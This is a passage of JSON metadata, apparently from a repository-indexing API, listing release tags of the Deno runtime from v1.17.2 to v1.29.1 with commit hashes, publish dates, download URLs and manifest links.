tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17: